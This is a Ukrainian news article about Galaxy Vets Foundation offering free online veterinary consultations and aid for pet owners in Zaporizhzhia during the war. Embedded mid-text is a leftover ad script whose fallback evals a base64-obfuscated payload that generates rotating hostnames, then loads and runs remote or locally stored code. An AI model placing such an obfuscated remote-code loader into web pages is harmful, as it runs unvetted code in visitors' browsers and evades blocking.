Жителі Запоріжжя можуть отримати безкоштовну консультацію ветеринарів

Galaxy Vets Foundation, некомерційний підрозділ американської мережі ветеринарних клінік, запустив ініціативу Animal Help Ukraine.

В рамках проєкту ветеринари з США, а також Канади, Великобританії та інших країн світу, надаватимуть власникам тварин з Запоріжжя безкоштовні консультації онлайн. Поговорити з ветеринаром можна на сайті.

Консультації будуть відбуватись у чаті, який оснащений автоматичним перекладачем для подолання мовного бар’єру між учасниками. Щоб почати чат, треба тільки вказати власне ім’я. У користувачів платформи буде можливість відправити на свою електронну скриньку запис чату та повернутись до нього пізніше.

Можна поставити будь-які питання стосовно здоров’я домашнього улюбленця або догляду за знайденою твариною. Зокрема:

харчування – як знайти альтернативи звичайному корму в умовах війни та перейти на натуральні продукти;спокій тварини – як знизити тривожність та стрес улюбленця під час вибухів;перша допомога – які врятувати тварину в екстремальних умовах;екзотичні тварини – як допомогти тим, за ким потрібен особливий догляд;медикаменти – що робити в разі відсутності необхідного препарату та які “людські” відповідники можна використовувати для лікування тварин.

Також сервіс має власну бібліотеку матеріалів та ресурсів. Там українці знайдуть рекомендації по догляду та поради зі збереження здоров’я домашніх улюбленців.

Мета фонду – надати доступ до ветеринарної медицини тим, хто цього потребує; підтримати українську економіку та допомогти тваринам, що страждають через гуманітарну катастрофу. Galaxy Vets Foundation також надає фінансову і матеріальну допомогу притулкам для тварин, зоопаркам, волонтерським та іншим організаціям. На кошти, зібрані завдяки міжнародній спільноті, фундація купує їжу для тварин, медикаменти та інші необхідні матеріали у місцевих виробників, і організовує доставку у райони, які найбільше цього потребують. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Допомога вже почала надходити до перших адресатів. Так, хвостаті бійці ЗСУ у м. Харків одержали запас корму та препарати для захисту від бліх, глистів та кліщів.

Надіслати запит на допомогу можна на сайті: https://galaxyvets.foundation/uk/contact-us/.

Компанія Galaxy Vets заснована харків’янином, ветеринаром за фахом, Іваном Захаренковим. «Україна – моя Батьківщина. Варварське вторгнення Росії на її території вбиває тисячі людей, в цей час тисячі домашніх тварин стають безпритульними та потребують допомоги. Відсутність доступу до ветеринарних послуг – це проблема, яку ми хочемо допомогти вирішити за допомогою роботи нашої платформи. Ми допомагатимемо тим, що вміємо найкраще – рятувати життя тварин», – коментує Іван Захаренков, генеральний директор Galaxy Vets

Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/zhiteli-zaporizhzhya-mozhut-otrimati-bezkoshtovnu-konsultatsiyu-veterinariv/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top